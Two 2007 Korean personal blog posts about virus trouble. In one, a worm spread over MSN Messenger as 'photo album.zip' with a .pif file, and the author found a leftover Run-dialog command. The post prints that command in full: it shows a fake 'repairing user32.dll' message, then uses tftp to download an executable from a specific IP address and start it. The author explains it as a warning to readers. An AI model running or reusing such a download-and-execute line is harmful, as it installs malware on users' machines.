달력

32024  이전 다음

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31

'바이러스'에 해당되는 글 2건

  1. 2007.04.06 이것도 바이러스인가? ;;;; 4
  2. 2007.03.27 [경보] 새로운 바이러스 등장!! 7
요 몇일 바이러스에 지독하게도 고생하고 있습니다.

정말 어제까지만해도.. 다 밀어버리고 리눅스로 가야겠다! 라고 마음먹었을 정도니까요;;
(하지만 못가게 막은건 역시 인터넷 뱅킹이였습니다;;;)

ActiveX가 또 다시 원망스러워졌습니다..;;

어찌됐든간에..
오늘 회사에서 K모 회사에서 설정 변경을 하는 방법을 알려달라고 해서 간단히 문서작업을 하고 있었습니다.
(언제나 그렇듯.. 말로하면 몇마디 안되는데 메뉴얼로 작성하면 꽤 페이지가 나오죠;;
개발자분들이 프로그램 만드는 것보다 메뉴얼 만드는게 더 어렵다는 말을 실감케하는 순간이였습니다..)

한시간여 직접실행하고 내용 캡쳐하고 수정하고.. 
고작 5페이지 만들어서 회사사람들에게 돌리고 돌아섰는데.. 그러더군요;;
평소처럼 파일 전송이였으니 아웃룩에서 덩그러니.. 파일만 첨부해서 보냈는데..
내용이 있다는 것이였습니다.

것도 전혀 처음보는..

그래서 다시 전달해달라고 부탁을 드렸죠..
사용자 삽입 이미지

ㅡ.,ㅡ;; 저게 먼 단어랍니까;;;
단어를 보아하니.. 영어는 아닌거 같고 저쪽 유럽쪽 같긴한데..;;

구글에서 찾아봤는데..
몇개의 결과가 나왔는데 그나마 도움되는 것은 하나도 없더군요.
다들 mailing list에 포함되어있는..

아무래도 메일과 밀접한 관련이 있는 것 같은데..
검색해도 안나오고..

혹시 이에 대한 정보 아시는 분 계신가요??

지긋지긋한 바이러스.. 정말 사람 혼을 빼놓습니다 ㅡ.ㅜ
Posted by 컴ⓣing
|

회사에서 일하고 있는데 MSN메신저에 등록된 초등학교 친구로부터
파일이 하나 전송되었다..

평소에 대화를 잘 하지 않는 친구였는데..
갑자기 파일을 보내다니.. 이상하다 생각은 했지만.. 수락해서 받았고,
파일이름은 photo album.zip 이였다.

파일을 클릭해서 여니 photo album2007.pif 이라는 파일이 들어있었고,
다행이 압축을 특정 경로에 풀어서 실행한게 아니라 알집에서 더블클릭해서 오픈한 것이기에..
TMP 디렉토리에 풀리게 되었었다.

즉시 하우리 백신 프로그램에서 바이러스라는 경보를 띄우면서 차단했고
다행히 바이러스로 부터 탈출을 했다.


이상해서 친구에게 대화를 걸었더니 어제 바이러스에 감염되었다고 말하면서 다 잡은줄 알았는데 잘 모르겠다는
말도 이어졌다.

일단은 백신 프로그램을 받고 설치한 후에 인터넷 선을 제거하고 바이러스부터 잡으라는 말을 했다.

도스시절에야 F5키를 눌러서 부팅하고 V3로 모든 파일을 점검하면 끝이였으나 지금은 백신프로그램도
프로그램이기에 설치를 해야되서 초보자인 친구들에게 어떻게 하라..라는 설명을 하기도 무척이나 애매하다.



몇 시간뒤..
다시 메신저 창이 열리면서
hey man accept my new photo album.. :( ...
라는 내용이 떴다..그제서야 눈치챘고 확인해보니 바이러스가 확실했다.

네이버에 관련 뉴스가 떠서 링크를 해본다.

메신저로 급속 확산 ‘웜’ 주의보…메신저 전송 사진 열지 마세요


이후 뉴스에 나와있는 rdshost.dll 파일이 시스템에 존재하지 않을까 라는 우려로
파일찾기를 통해 검색하던 중.. 시스템이 심하게 버벅거리는 현상이 발생..
Windows 작업관리자를 호출, explorer.exe 프로세서를 죽이고 다시 실행하려고 들어갔는데..

실행창에 알수없는 명령이 남겨져있었다.

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 38.98.159.34 GET otdxxgcf.exe & start otdxxgcf&

대충 내용을 보니..
1. command prompt를 띄우고
2. user32.dll 파일을 고친다는 메시지를 띄우면서
3. 38.98.159.34 주소를 가진 호스트로 접속해서
4. otdxxgcf.exe파일을 받아서 실행해라.

이상하단 생각에..
일단 IP를 조회했다.

OrgName:    Performance Systems International Inc.
OrgID:      PSI
Address:    1015 31st St NW
City:       Washington
StateProv:  DC
PostalCode: 20007
Country:    US


미국 워싱턴에 있는 PSI 의 IP였다. 소득없이 허탕..
게다가 현재에 ping을 쏴봐도 응답이 없었다. 개인PC로 생각될뿐..

실행파일명을 구글에서 조회해도 아무런 결과는 없고..
(보나마나 뻔하다.. 임의로 생각되는 파일임이 분명..)


혹시 MSN메신저로 그러한 파일을 요청을 받은 적이 있는가?
그렇다면 시작버튼을 누르고 실행에서 명령 기록을 한번 확인해보십시오.

사용자 삽입 이미지


자.. 여러분의 PC는 안전하십니까??

Posted by 컴ⓣing
|